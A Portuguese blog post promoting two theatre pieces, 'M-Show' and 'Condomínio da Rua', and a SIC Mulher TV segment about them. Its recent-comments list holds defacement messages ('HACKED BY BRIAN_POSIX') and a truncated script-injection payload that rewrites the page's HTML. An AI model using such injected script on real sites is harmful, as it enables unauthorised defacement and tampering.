"M-Show" revela Sebastião M, 35 anos, apresentador de um programa radical que à meia-noite é sintonizado por mais de um milhão de espectadores: o M-SHOW! A irreverência e a bizarria são trunfos de um talk-show onde os convidados são enxovalhados sem piedade.

 

Inesperadamente, apenas um foco de luz ilumina o rosto de Sebastião M, enquanto o resto do palco mergulha na penumbra. Nesse momento, sussurra para o público, confessando os seus pensamentos mais íntimos. Como se alguém tivesse feito uma pausa com o telecomando, percebe-se que Sebastião M não é a figura bizarra que todos acreditavam ser. Chora por dentro de cada vez que humilha um convidado, mas sabe que é isso que se espera do seu desempenho, que não tenha medo de ser aquilo que nele se projeta: a nossa violência dissimulada! Sebastião M é uma das tantas aberrações que habitam o imaginário mediático onde a ficção e a realidade se confundem demasiadas vezes… Demasiadas mesmo.
Esta peça faz parte de uma trilogia que começou com Figuração especial, obra estreada em outubro de 2009 no Centro Cultural da Malaposta, e que foi editada em livro pela Fonte da Palavra em junho de 2011. O texto final, Aqueles de que ninguém fala, encerrará esta reflexão sobre o universo dos media no Portugal pós- 25 de abril.

 

 

"Condomínio da Rua", com encenação de João Mota, conta com a colaboração do professor de Psiquiatria da Faculdade de Medicina de Lisboa, Daniel Sampaio, que assina, neste espetáculo, a consultoria de análise comportamental. Este texto original, a partir de improvisações, aborda os caminhos do submundo do ser humano, os seus segredos e dilemas e traz a debate a questão da exclusão social, dos dramas pessoais daqueles que vivem na miséria ou dos sem-abrigo e excluídos e as suas implicações patológicas, familiares, culturais e sociais.

 

Num movimento de introspeção, seis atores do elenco do TNDM II colocarão em palco a questão da falta do afeto perdido desde a infância. Problematiza-se, sobretudo, o amor, a sua necessidade e as consequências da sua ausência, permitindo-nos aperceber da complexidade da pobreza e da exclusão.

 

 

Não perca sobre estas novidades com João mota, Paula Mora e Marcantónio del Carlo.

 

Na SIC Mulher desta quarta-feira, às 17:30, na SIC Mulher!

 

Veja o vídeo aqui!

 




Tags:

De
 
Nome

Url

Email

Guardar Dados?

Ainda não tem um Blog no SAPO? Crie já um. É grátis.

Comentário

Máximo de 4300 caracteres



Copiar caracteres

 



O dono deste Blog optou por gravar os IPs de quem comenta os seus posts.

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO